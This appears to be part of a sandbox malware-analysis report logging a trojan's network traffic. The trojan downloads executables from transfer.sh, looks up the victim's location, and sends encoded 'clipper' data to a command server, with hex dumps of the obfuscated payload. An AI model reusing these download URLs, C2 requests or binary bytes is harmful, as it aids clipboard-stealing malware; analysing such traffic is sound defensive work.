5a 44 49 73 4f 44 51 73 59 57 4d 73 59 6a 67 73 59 6a 49 73 5a 44 6b 73 5a 44 4d 73 4f 44 6b 73 5a 44 45 73 59 6d 45 73 5a 47 59 73 5a 6a 49 73 59 7a 4d 73 59 6d 45 73 59 7a 41 73 4f 54 63 73 5a 47 55 73 59 7a 49 73 4e 32 4d 73 4e 6a 4d 73 4e 32 59 73 4e 7a 59 73 59 6a 59 73 4e 6d 45 73 5a 47 55 73 59 54 4d 73 5a 44 49 73 59 6d 51 73 5a 44 67 73 5a 47 51 73 4f 47 51 73 4f 54 6b 73 4f 44 55 73 4e 7a 59 73 4f 54 67 73 59 7a 41 73 59 54 45 73 4f 54 67 73 4f 57 4d 73 4e 7a 51 73 4f 54 41 73 4e 7a 51 73
                            Data Ascii: {"clipper":"YzcsNWIsZDgsZGIsYzQsY2YsYjcsZWIsZDksYjYsYjksYjksOTgsZTgsYjEsYTgsYTUsNmQsN2IsNzUsNjgsOWUsOGUsODgsYjcsZGQsZWIsZGEsZGYsZGEsYzIsNTUsODYsNTksYTcsOGUsNzQsOTAsYjQsZTAsZTksYzAsYjksNzUsNmQsOWEsNmYsNzAsNjQsNmQsNmQsNzUsNTksZDQsZTIsYzksNzgsYTIsOTcsOGQsY2YsYzgsODUsYTQsYzYsOWQsZWYsOTYsY2QsZTQsYjUsZWUsZTQsODcsYmEsOGIsYWQsZTAsYmUsYjksNjMsYmUsYmIsYzcsYTMsZGEsZTMsZDAsYmEsY2IsZWUsZGIsZTMsYzksODQsOTksODUsYTAsZWEsZDAsOGEsZDEsNjYsYTQsOWEsNzQsYjYsYjYsOWIsOWMsODcsNjMsNTUsYmMsYjEsYjYsYTUsZDcsYTIsZGUsYzksZGMsYTcsYTMsZDEsZDIsODQsYWMsYjgsYjIsZDksZDMsODksZDEsYmEsZGYsZjIsYzMsYmEsYzAsOTcsZGUsYzIsN2MsNjMsN2YsNzYsYjYsNmEsZGUsYTMsZDIsYmQsZDgsZGQsOGQsOTksODUsNzYsOTgsYzAsYTEsOTgsOWMsNzQsOTAsNzQs
                            May 14, 2023 04:51:00.751512051 CEST1783INData Raw: 5a 6a 41 73 59 6d 49 73 4f 44 67 73 4f 47 45 73 4f 54 59 73 4f 54 51 73 59 57 59 73 4f 47 55 73 59 54 51 73 4e 6d 4d 73 4f 47 55 73 4e 7a 4d 73 4f 47 45 73 4e 7a 6b 73 5a 44 51 73 59 54 51 73 4f 57 51 73 59 6a 6b 73 59 7a 6b 73 59 57 45 73 4f 57
                            Data Ascii: ZjAsYmIsODgsOGEsOTYsOTQsYWYsOGUsYTQsNmMsOGUsNzMsOGEsNzksZDQsYTQsOWQsYjksYzksYWEsOWQsOWUsOWMsODgsNjcsOTIsNmQsYWQsYzcsOGQsYTYsODksYWMsYmIsODgsOGEsOGMsOTYsYjMsOGYsODQsNTUsNzcsNjEsNzcsYWYsZGYsZTAsODgsOTAsODgsOTksOTgsOWUsODcsODAsNTMsNmUsYTUsZWEsYzU


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            7192.168.2.349707144.76.136.15380C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:51:06.336122036 CEST1783OUTGET /get/1h9hjM/LoWin64.exe HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Monkey
                            Host: transfer.sh
                            May 14, 2023 04:51:06.358567953 CEST1784INHTTP/1.1 301 Moved Permanently
                            Server: nginx/1.18.0
                            Date: Sun, 14 May 2023 02:51:06 GMT
                            Content-Type: text/html
                            Content-Length: 169
                            Connection: keep-alive
                            Location: https://transfer.sh/get/1h9hjM/LoWin64.exe
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            8192.168.2.349710208.95.112.180C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:51:15.851380110 CEST3414OUTGET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: ip-api.com
                            May 14, 2023 04:51:15.889153004 CEST3415INHTTP/1.1 200 OK
                            Date: Sun, 14 May 2023 02:51:15 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 110
                            Access-Control-Allow-Origin: *
                            X-Ttl: 23
                            X-Rl: 43
                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 37 22 7d
                            Data Ascii: {"status":"success","countryCode":"CH","city":"Hunenberg","timezone":"Europe/Zurich","query":"102.129.143.47"}


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            9192.168.2.349712185.159.129.16880C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            May 14, 2023 04:51:37.208010912 CEST3416OUTPUT /clpr/OWUsODMsODQsOWIsOWYsODIsOGEsOTIsNjgsN2Us HTTP/1.1
                            Content-Type: application/json
                            User-Agent: Cat
                            Host: 185.159.129.168
                            Content-Length: 599
                            Cache-Control: no-cache
                            Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 59 73 59 54 55 73 5a 47 59 73 5a 44 49 73 59 7a 51 73 5a 44 4d 73 59 6a 59 73 59 7a 45 73 5a 47 55 73 4f 47 59 73 4f 47 51 73 4f 44 63 73 4e 54 6b 73 5a 54 45 73 59 7a 49 73 59 57 4d 73 4f 54 63 73 4f 44 67 73 4f 44 55 73 4f 44 55 73 4e 6d 51 73 59 6a 63 73 59 6a 49 73 4f 57 4d 73 4f 44 6b 73 4f 57 51 73 59 57 51 73 59 54 4d 73 59 6a 4d 73 4f 57 49 73 4f 44 67 73 4e 7a 67 73 4f 44 55 73 4e 32 45 73 59 57 59 73 4f 54 63 73 4f 44 6b 73 59 6a 45 73 4e 7a 67 73 59 6a 41 73 59 6a 4d 73 4f 47 49 73 4f 57 45 73 4f 44 67 73 4e 7a 6b 73 59 57 59 73 4f 44 51 73 4f 44 55 73 4e 6d 4d 73 4f 47 4d 73 4e 6a 63 73 59 6a 67 73 59 54 59 73 5a 47 59 73 5a 47 55 73 5a 47 49 73 59 32 45 73 59 32 51 73 5a 54 6b 73 59 54 67 73 59 54 45 73 4f 54 55 73 4f 44 6b 73 4e 6a 63 73 4f 44 49 73 4e 6d 51 73 4f 57 4d 73 5a 44 63 73 59 7a 63 73 5a 44 4d 73 59 6a 59 73 59 6a 55 73 5a 54 49 73 59 6a 4d 73 59 7a 59 73 59 6a 63 73 59 57 51 73 59 54 41 73 59 6d 55 73 59 6a 67 73 4f 54 67 73 59 6d 51 73 59 6d 45 73 4f 54 49 73 4e 6a 67 73 59 54 49 73 59 54 41 73 4f 54 51 73 4f 44 63 73 4f 57 45 73 59 6a 41 73 4f 54 6b 73 4f 57 55 73 4f 54 6b 73 4f 44 63 73 4e 6a 45 73 4f 44 41 73 4e 7a 41 73 4f 57 4d 73 59 7a 55 73 59 7a 4d 73 5a 54 4d 73 59 6a 49 73 5a 57 4d 73 5a 57 4d 73 59 32 49 73 4f 54 45 73 4f 54 59 73 4e 32 49 73 59 54 41 73 59 6a 41 73 59 57 4d 73 59 54 63 73 59 7a 51 73 4e 32 55 73 4f 57 51 73 59 57 4d 73 5a 54 41 73 5a 44 4d 73 5a 44 51 73 59 6a 67 73 59 32 51 73 5a 54 6b 73 5a 44 49 73 4f 54 4d 73 5a 44 6b 73 59 6d 51 73 59 54 41 73 59 6a 45 73 59 6a 4d 73 5a 54 55 73 5a 44 41 73 59 6a 6b 73 59 57 49 73 4f 44 6b 73 5a 57 51 73 5a 57 4d 73 59 7a 45 73 59 7a 51 73 59 6a 67 73 4e 6a 49 73 5a 44 51 73 59 7a 49 73 59 6a 55 73 4f 57 4d 73 59 57 55 73 59 54 6b 3d 22 7d
                            Data Ascii: {"data":"YWYsYTUsZGYsZDIsYzQsZDMsYjYsYzEsZGUsOGYsOGQsODcsNTksZTEsYzIsYWMsOTcsODgsODUsODUsNmQsYjcsYjIsOWMsODksOWQsYWQsYTMsYjMsOWIsODgsNzgsODUsN2EsYWYsOTcsODksYjEsNzgsYjAsYjMsOGIsOWEsODgsNzksYWYsODQsODUsNmMsOGMsNjcsYjgsYTYsZGYsZGUsZGIsY2EsY2QsZTksYTgsYTEsOTUsODksNjcsODIsNmQsOWMsZDcsYzcsZDMsYjYsYjUsZTIsYjMsYzYsYjcsYWQsYTAsYmUsYjgsOTgsYmQsYmEsOTIsNjgsYTIsYTAsOTQsODcsOWEsYjAsOTksOWUsOTksODcsNjEsODAsNzAsOWMsYzUsYzMsZTMsYjIsZWMsZWMsY2IsOTEsOTYsN2IsYTAsYjAsYWMsYTcsYzQsN2UsOWQsYWMsZTAsZDMsZDQsYjgsY2QsZTksZDIsOTMsZDksYmQsYTAsYjEsYjMsZTUsZDAsYjksYWIsODksZWQsZWMsYzEsYzQsYjgsNjIsZDQsYzIsYjUsOWMsYWUsYTk="}
                            May 14, 2023 04:51:37.270178080 CEST3416INHTTP/1.1 503 Service Temporarily Unavailable
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Sun, 14 May 2023 02:51:37 GMT
                            Content-Type: text/html
                            Content-Length: 206
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>503 Service Temporarily Unavailable</title></head><body><center><h1>503 Service Temporarily Unavailable</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.349702144.76.136.153443C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            TimestampkBytes transferredDirectionData
                            2023-05-14 02:49:53 UTC0OUTGET /get/1PRjTr/clip.exe HTTP/1.1
                            User-Agent: Monkey
                            Host: transfer.sh
                            Connection: Keep-Alive
                            2023-05-14 02:49:53 UTC0INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 14 May 2023 02:49:53 GMT
                            Content-Type: application/x-ms-dos-executable
                            Content-Length: 1619428
                            Connection: close
                            Cache-Control: no-store
                            Content-Disposition: attachment; filename="clip.exe"
                            Retry-After: Sun, 14 May 2023 04:49:55 GMT
                            X-Made-With: <3 by DutchCoders
                            X-Ratelimit-Key: 127.0.0.1,102.129.143.47,102.129.143.47
                            X-Ratelimit-Limit: 10
                            X-Ratelimit-Rate: 600
                            X-Ratelimit-Remaining: 9
                            X-Ratelimit-Reset: 1684032595
                            X-Remaining-Days: n/a
                            X-Remaining-Downloads: n/a
                            X-Served-By: Proudly served by DutchCoders
                            Strict-Transport-Security: max-age=63072000
                            2023-05-14 02:49:53 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b2 dd c4 44 f6 bc aa 17 f6 bc aa 17 f6 bc aa 17 e2 d7 ae 16 eb bc aa 17 e2 d7 a9 16 e3 bc aa 17 e2 d7 af 16 38 bc aa 17 a4 c9 af 16 d0 bc aa 17 a4 c9 ae 16 e4 bc aa 17 a4 c9 a9 16 fc bc aa 17 e2 d7 ab 16 f3 bc aa 17 f6 bc ab 17 88 bc aa 17 f6 bc aa 17 f7 bc aa 17 92 c6 ae 16 b4 bc aa 17 32 c9 ae 16 f7 bc aa 17 32 c9 aa 16 f7 bc aa 17 32 c9 55 17 f7 bc aa 17 f6 bc 3d 17 f7 bc aa
                            Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$D8222U=
                            2023-05-14 02:49:53 UTC16INData Raw: f9 72 06 c2 a5 7d 4c fe 4a e8 04 00 00 00 95 99 5b a9 48 ff c4 e9 06 00 00 00 c5 16 41 81 6b e3 48 ff c4 f9 eb 06 92 22 2b 22 6d bd 72 04 d7 1a ee f9 48 ff c4 f8 e9 06 00 00 00 d2 41 61 60 36 f3 73 06 4e 9e c7 1c 1d bf 48 ff c4 f9 eb 07 a9 13 2f 4b 4d fd 32 72 03 25 9d 7c 48 ff c4 f9 e9 05 00 00 00 e3 89 87 d7 3b 72 07 35 a4 8a a1 4c e2 a4 48 ff c4 f8 eb 02 e5 70 73 06 3b cb 81 da 11 17 48 ff c4 eb 04 44 12 59 4c 48 ff c4 f8 e9 05 00 00 00 21 64 cc 5b d7 73 07 3e 73 b4 3d 25 3d de e9 03 00 00 00 c7 e8 72 eb 04 c5 5c 83 f2 9e 48 8b 04 24 48 8d 64 24 08 e9 07 00 00 00 8f 45 98 33 a7 c5 13 8b 44 24 50 c7 44 24 48 04 00 00 00 c7 44 24 40 00 00 00 00 c7 44 24 38 02 00 00 00 48 8d 64 24 f8 48 89 04 24 eb 07 ef ba ad 6e b7 1b ff 9f e9 05 00 00 00 63 5c e5 2a eb
                            Data Ascii: r}LJ[HAkH"+"mrHAa`6sNH/KM2r%|H;r5LHps;HDYLH!d[s>s=%=r\H$Hd$E3D$PD$HD$@D$8Hd$H$nc\*
                            2023-05-14 02:49:53 UTC32INData Raw: e9 05 00 00 00 65 45 3a 6a 60 9e 48 8b 04 24 e9 05 00 00 00 9e 41 e0 14 77 48 8d 64 24 08 48 89 44 24 48 e9 02 00 00 00 43 29 48 8d 64 24 f8 e9 04 00 00 00 4e 32 b1 49 48 89 04 24 9f e9 05 00 00 00 fb 77 71 9e a0 f9 72 04 3f c0 78 a6 e8 03 00 00 00 7e 41 5e 48 83 c4 08 eb 05 75 44 7d fd a2 9e 58 eb 02 a4 20 48 83 7c 24 48 00 e9 05 00 00 00 f2 70 39 b5 fe 9c eb 03 c1 85 9c f8 e9 05 00 00 00 16 cc 48 c4 59 73 02 fb ba e8 02 00 00 00 9b 3e 48 83 c4 08 9d eb 05 e4 db 94 da a3 eb 05 32 b8 f0 31 1a 0f 85 04 01 00 00 9c e9 03 00 00 00 d3 81 a1 f8 eb 02 84 7a 73 07 be d5 38 12 c5 f9 6d e8 02 00 00 00 f5 5d 48 ff c4 38 d2 e9 05 00 00 00 6b a9 92 c2 25 74 03 42 bb fd 48 ff c4 eb 03 20 1b e1 48 ff c4 38 f6 eb 04 65 f7 dd b8 74 05 d1 26 60 15 cb 48 ff c4 38 ff eb 05
                            Data Ascii: eE:j`H$AwHd$HD$HC)Hd$N2IH$wqr?x~A^HuD}X H|$Hp9HYs>H21zs8m]H8k%tBH H8et&`H8
                            2023-05-14 02:49:53 UTC48INData Raw: 02 00 00 00 31 ec e9 07 00 00 00 98 2c 90 ea 82 86 5e b8 46 00 00 00 eb 05 2e 2e 32 cd ea 48 8d 64 24 f8 48 89 04 24 9f e9 07 00 00 00 ce 46 c4 cc d6 d0 39 f9 e9 07 00 00 00 ce b4 3b c4 ca db 89 72 06 19 da 4a 25 20 ac e8 03 00 00 00 47 d3 1b 48 83 c4 08 e9 06 00 00 00 ca f2 b0 77 b2 2b eb 05 31 92 be 69 8e 9e 48 8b 04 24 e9 06 00 00 00 8c 78 b4 1e c7 d0 48 8d 64 24 08 e9 03 00 00 00 70 28 67 eb 07 a2 20 d7 99 4d 79 68 66 89 44 24 5a b8 38 00 00 00 66 89 44 24 5c b8 43 00 00 00 66 89 44 24 5e b8 38 00 00 00 9c 38 c9 eb 05 77 ec 92 82 51 74 02 c6 42 e8 07 00 00 00 f7 c4 38 c6 22 88 3d 48 ff c4 48 ff c4 f8 73 07 4b 22 c3 76 e6 c0 12 48 ff c4 eb 02 2f d7 48 ff c4 38 c0 eb 03 78 2b b3 74 02 18 d4 48 ff c4 e9 06 00 00 00 70 9e f0 c9 78 fa 48 ff c4 38 db eb 03
                            Data Ascii: 1,^F..2Hd$H$F9;rJ% GHw+1iH$xHd$p(g MyhfD$Z8fD$\CfD$^88wQtB8"=HHsK"vH/H8x+tHpxH8
                            2023-05-14 02:49:53 UTC64INData Raw: 24 08 e9 03 00 00 00 65 e8 66 eb 06 4f d9 54 46 63 6a 48 8b 44 24 30 50 e9 02 00 00 00 b4 72 9f e8 06 00 00 00 bd 2b fb b8 55 bf 48 83 04 24 1f f8 e9 04 00 00 00 1f ed 2a 1f 73 03 ee d1 8b c3 2a 85 8e 89 e9 03 00 00 00 51 9a 91 eb 04 69 53 47 93 9e 48 8b 04 24 eb 05 9e d7 c2 23 84 48 8d 64 24 08 eb 05 f0 62 24 70 fc e9 05 00 00 00 e8 98 6d b8 2f e9 54 00 00 00 e9 07 00 00 00 60 6b 9f fa 86 b6 6a 50 e9 07 00 00 00 f3 20 2b 1d 3e 97 80 9f eb 07 9d 77 29 36 fc a4 b2 eb 03 c6 2f 1e e8 06 00 00 00 2c 4d 7c ab cc 6d 48 83 c4 08 eb 02 68 63 e9 02 00 00 00 65 b4 9e 58 e9 06 00 00 00 27 86 1a 8b 16 50 e9 00 00 00 00 48 83 c4 28 c3 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 e9 63 00 00 00 48 8d 64 24 f8 eb 03 82 ce 85 48 89 04 24 eb 04 9e 8f f2 50 9f eb 07 8d 62 5e
                            Data Ascii: $efOTFcjHD$0Pr+UH$*s*QiSGH$#Hd$b$pm/T`kjP +>w)6/,M|mHhceX'PH(HT$HL$H8cHd$H$Pb^
                            2023-05-14 02:49:53 UTC80INData Raw: 48 89 04 24 eb 06 bb 83 93 59 c9 f3 9f e9 02 00 00 00 65 d3 f8 e9 03 00 00 00 94 c5 6f 73 06 ea b3 19 3c 1d 8c e8 02 00 00 00 26 96 48 ff c4 48 ff c4 f9 eb 04 e3 d6 94 36 72 03 a7 93 cc 48 ff c4 f8 e9 07 00 00 00 4c 7b b9 37 9d c4 a8 73 03 26 b6 c3 48 ff c4 f9 eb 05 54 d6 e4 5a 11 72 07 ca c2 eb 25 c7 e4 bd 48 ff c4 eb 02 5a ac 48 ff c4 f9 72 03 c6 7a 21 48 ff c4 f8 73 04 4f ae 2d 60 48 ff c4 f9 72 05 46 3e 8f c9 f7 eb 03 e2 4b 66 9e 58 48 89 4c 24 78 eb 05 6a ea ef be 4f 9c e9 07 00 00 00 a9 22 72 45 53 af ad e8 05 00 00 00 a7 a3 98 28 71 48 8d 64 24 08 eb 06 6d 59 7e 98 83 af 9d e9 05 00 00 00 b6 a0 71 e7 dc 48 63 54 24 34 50 e9 02 00 00 00 7f 77 9f e9 02 00 00 00 df 19 e8 02 00 00 00 18 fe 48 ff c4 e9 03 00 00 00 dc 8f 7f 48 ff c4 f8 e9 04 00 00 00 cd
                            Data Ascii: H$Yeos<&HH6rHL{7s&HTZr%HZHrz!HsO-`HrF>KfXHL$xjO"rES(qHd$mY~qHcT$4PwHH
                            2023-05-14 02:49:53 UTC96INData Raw: e8 02 00 00 00 1f 18 48 ff c4 f9 72 03 c6 2c f3 48 ff c4 38 d2 eb 03 46 4e ad 74 07 40 7c 50 84 bb 39 9e 48 ff c4 38 ed e9 05 00 00 00 a2 ea e1 5e 43 74 06 ad 22 6b c5 71 b0 48 ff c4 f8 73 02 a3 ae 48 ff c4 f9 e9 04 00 00 00 1d bc 8e d8 72 02 25 94 48 ff c4 f9 e9 03 00 00 00 a6 ec 81 72 06 93 7a 6c 76 6c be 48 ff c4 38 ed 74 02 cc 76 48 ff c4 eb 03 db 20 57 eb 03 8e 30 12 e9 03 00 00 00 e2 4c 70 9e 48 8b 04 24 48 8d 64 24 08 e9 07 00 00 00 b5 86 40 c1 48 9f 80 c6 44 24 64 61 eb 04 c8 4e 5c 2f 9c e9 03 00 00 00 72 15 9d f8 e9 05 00 00 00 e8 6a 68 24 9e 73 07 a3 ae 8d 70 c4 3f d1 e8 05 00 00 00 d3 9a b5 90 a8 48 83 c4 08 eb 06 f2 4b 8e 88 81 7a 9d e9 04 00 00 00 70 a7 a0 b9 eb 04 c7 53 29 62 c6 44 24 65 69 eb 07 62 29 a2 33 1a 74 c8 50 e9 02 00 00 00 df 86
                            Data Ascii: Hr,H8FNt@|P9H8^Ct"kqHsHr%HrzlvlH8tvH W0LpH$Hd$@HD$daN\/rjh$sp?HKzpS)bD$eib)3tP
                            2023-05-14 02:49:53 UTC112INData Raw: b7 48 83 c4 08 eb 07 7f a5 a2 f7 f8 23 95 9e 48 8b 04 24 e9 05 00 00 00 f7 c9 e0 87 7a 48 8d 64 24 08 eb 07 27 fe 52 61 4c bf 8f e9 04 00 00 00 5b 56 bb 48 c6 44 24 10 2e c6 44 24 11 39 e9 06 00 00 00 ac bf d4 e3 96 15 48 8d 64 24 f8 48 89 04 24 eb 06 a8 56 af c0 26 c0 9f f9 eb 02 ed 66 72 03 ce 41 78 e8 03 00 00 00 70 2d bb 48 83 c4 08 eb 07 75 75 c4 d4 2c a3 d4 9e 58 eb 06 8f 85 2f 1c 8a 65 e9 04 00 00 00 5a d9 17 ce c6 44 24 12 2e eb 06 f6 61 7e f2 19 20 48 8d 64 24 f8 48 89 04 24 e9 06 00 00 00 b4 1a 94 9e 37 eb 9f 38 c0 e9 06 00 00 00 95 11 37 83 7b 15 74 06 a7 43 5e fa 70 e5 e8 05 00 00 00 6f 9d 48 33 ae 48 83 c4 08 e9 05 00 00 00 6a 61 9a 59 e6 9e 58 e9 04 00 00 00 30 8b 83 b6 c6 44 24 13 30 e9 06 00 00 00 c5 cb 74 1c 75 23 9c f8 eb 04 e0 6e 45 95
                            Data Ascii: H#H$zHd$'RaL[VHD$.D$9Hd$H$V&frAxp-Huu,X/eZD$.a~ Hd$H$787{tC^poH3HjaYX0D$0tu#nE
                            2023-05-14 02:49:53 UTC128INData Raw: 48 8b 04 24 48 ff c0 48 89 04 24 48 8b 44 24 30 48 39 04 24 0f 83 6e 00 00 00 48 8b 44 24 28 0f b6 00 83 f8 3f 0f 85 1f 00 00 00 48 8b 44 24 28 48 ff c0 48 89 44 24 28 48 8b 44 24 20 48 ff c0 48 89 44 24 20 e9 b6 ff ff ff 48 8b 44 24 28 0f b6 00 48 8b 4c 24 20 0f b6 09 3b c1 0f 84 07 00 00 00 32 c0 e9 21 00 00 00 48 8b 44 24 28 48 ff c0 48 89 44 24 28 48 8b 44 24 20 48 ff c0 48 89 44 24 20 e9 78 ff ff ff b0 01 48 83 c4 18 c3 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 44 24 40 48 89 44 24 20 48 c7 44 24 28 00 00 00 00 e9 0d 00 00 00 48 8b 44 24 28 48 ff c0 48 89 44 24 28 48 8b 44 24 48 48 39 44 24 28 0f 83 3b 00 00 00 4c 8b 44 24 58 48 8b 54 24 50 48 8b 4c 24 20 e8 e3 fe ff ff 0f b6 c0 85 c0 0f 84 0a 00 00 00 48 8b 44 24
                            Data Ascii: H$HH$HD$0H9$nHD$(?HD$(HHD$(HD$ HHD$ HD$(HL$ ;2!HD$(HHD$(HD$ HHD$ xHLL$ LD$HT$HL$H8HD$@HD$ HD$(HD$(HHD$(HD$HH9D$(;LD$XHT$PHL$ HD$
                            2023-05-14 02:49:53 UTC144INData Raw: 91 d3 2b e9 e1 9f f9 eb 06 ad c9 72 e2 20 f6 72 05 85 64 ac 64 ac e8 05 00 00 00 cd 1c c1 90 3c 48 83 04 24 13 eb 02 54 dc c3 17 97 3f 24 e9 06 00 00 00 f1 6a 5c 23 f6 7b 9e 48 8b 04 24 48 8d 64 24 08 eb 05 c0 fe 27 54 9c e9 04 00 00 00 e8 73 fc 70 48 8d 44 24 20 eb 07 38 e8 dd 94 d8 fa be 48 8d 64 24 f8 eb 06 6b bd a5 26 f5 7d 48 89 04 24 eb 03 85 66 56 9f f9 e9 05 00 00 00 1a c0 94 db 7b 72 02 f4 77 e8 04 00 00 00 c3 91 96 7c 48 83 04 24 0e c3 d3 d1 35 e4 9e 58 48 8b f8 33 c0 e9 04 00 00 00 20 89 12 c1 48 8d 64 24 f8 eb 05 4f 77 20 1c 6c 48 89 04 24 e9 06 00 00 00 e2 1a 3d 9b 4c a0 9f eb 04 3b 99 5e a9 eb 03 da 2f bb e8 02 00 00 00 12 25 48 83 c4 08 e9 06 00 00 00 82 ad b9 b6 4d d9 9e 48 8b 04 24 e9 05 00 00 00 95 22 4c 3e ae 48 8d 64 24 08 eb 07 53 71
                            Data Ascii: +r rdd<H$T?$j\#{H$Hd$'TspHD$ 8Hd$k&}H$fV{rw|H$5XH3 Hd$Ow lH$=L;^/%HMH$"L>Hd$Sq
                            2023-05-14 02:49:53 UTC160INData Raw: 76 39 9f eb 02 4b f5 f9 eb 03 37 f4 d5 72 04 76 b1 1b 94 e8 06 00 00 00 98 5f 30 b1 99 8e 48 ff c4 38 c0 e9 06 00 00 00 e4 68 95 9c 6a 62 74 05 24 3c e6 ba ed 48 ff c4 f9 eb 07 73 a6 ca 17 4d 80 45 72 07 95 a2 13 b9 57 85 a4 48 ff c4 38 e4 74 07 cd 5c c6 ec 7b 62 2e 48 ff c4 f8 73 07 f3 48 71 f4 d2 d3 c8 48 ff c4 f9 eb 06 4c e2 6b a2 15 a2 72 06 d5 89 12 4b d5 a6 48 ff c4 38 c9 eb 05 81 9c 44 f9 d0 74 07 7b 1b f8 31 69 60 54 48 ff c4 e9 02 00 00 00 48 25 48 ff c4 f9 72 05 93 b7 93 e1 f9 e9 02 00 00 00 57 35 9e 58 e9 04 00 00 00 dc 2e d3 59 48 8b 4c 24 60 e9 06 00 00 00 9a f2 f9 9e 6b 52 48 8d 64 24 f8 eb 07 3f f2 a4 e6 2f d5 dd 48 89 04 24 eb 02 e0 2f 9f eb 02 b9 cd f8 73 02 7b 37 e8 02 00 00 00 80 b8 48 8d 64 24 08 eb 02 23 3c 9e 58 eb 07 f5 5b df 19 9c
                            Data Ascii: v9K7rv_0H8hjbt$<HsMErWH8t\{b.HsHqHLkrKH8Dt{1i`THH%HrW5X.YHL$`kRHd$?/H$/s{7Hd$#<X[
                            2023-05-14 02:49:54 UTC176INData Raw: fe 99 74 da f8 e9 02 00 00 00 c2 df 73 03 79 72 37 e8 04 00 00 00 a5 c0 37 83 48 8d 64 24 08 e9 03 00 00 00 b4 a8 e7 9e 48 8b 04 24 eb 02 25 37 48 8d 64 24 08 eb 06 81 fd 4b c8 f8 bd eb 04 dc b8 1e 55 48 89 4c 24 30 48 8d 64 24 f8 48 89 04 24 9f e9 04 00 00 00 f3 c5 64 cf f9 72 05 5a ae 87 ba 51 e8 03 00 00 00 3b f7 be 48 83 c4 08 e9 06 00 00 00 c6 8a 4d dc e1 9e e9 07 00 00 00 70 5b ca 88 b1 a5 4e 9e 58 e9 05 00 00 00 64 f2 ff da d4 48 8b 8c 24 a8 00 00 00 48 89 4c 24 28 eb 07 d4 ca da 42 72 2e 24 48 8d 64 24 f8 48 89 04 24 e9 03 00 00 00 9f b0 fe 9f eb 03 c5 8a 35 38 d2 74 05 ae 53 5c 8f aa e8 06 00 00 00 af f1 65 e1 64 5a 48 8d 64 24 08 e9 04 00 00 00 17 77 11 ab 9e 58 e9 02 00 00 00 e0 75 e9 02 00 00 00 7c ba 8b 8c 24 a0 00 00 00 89 4c 24 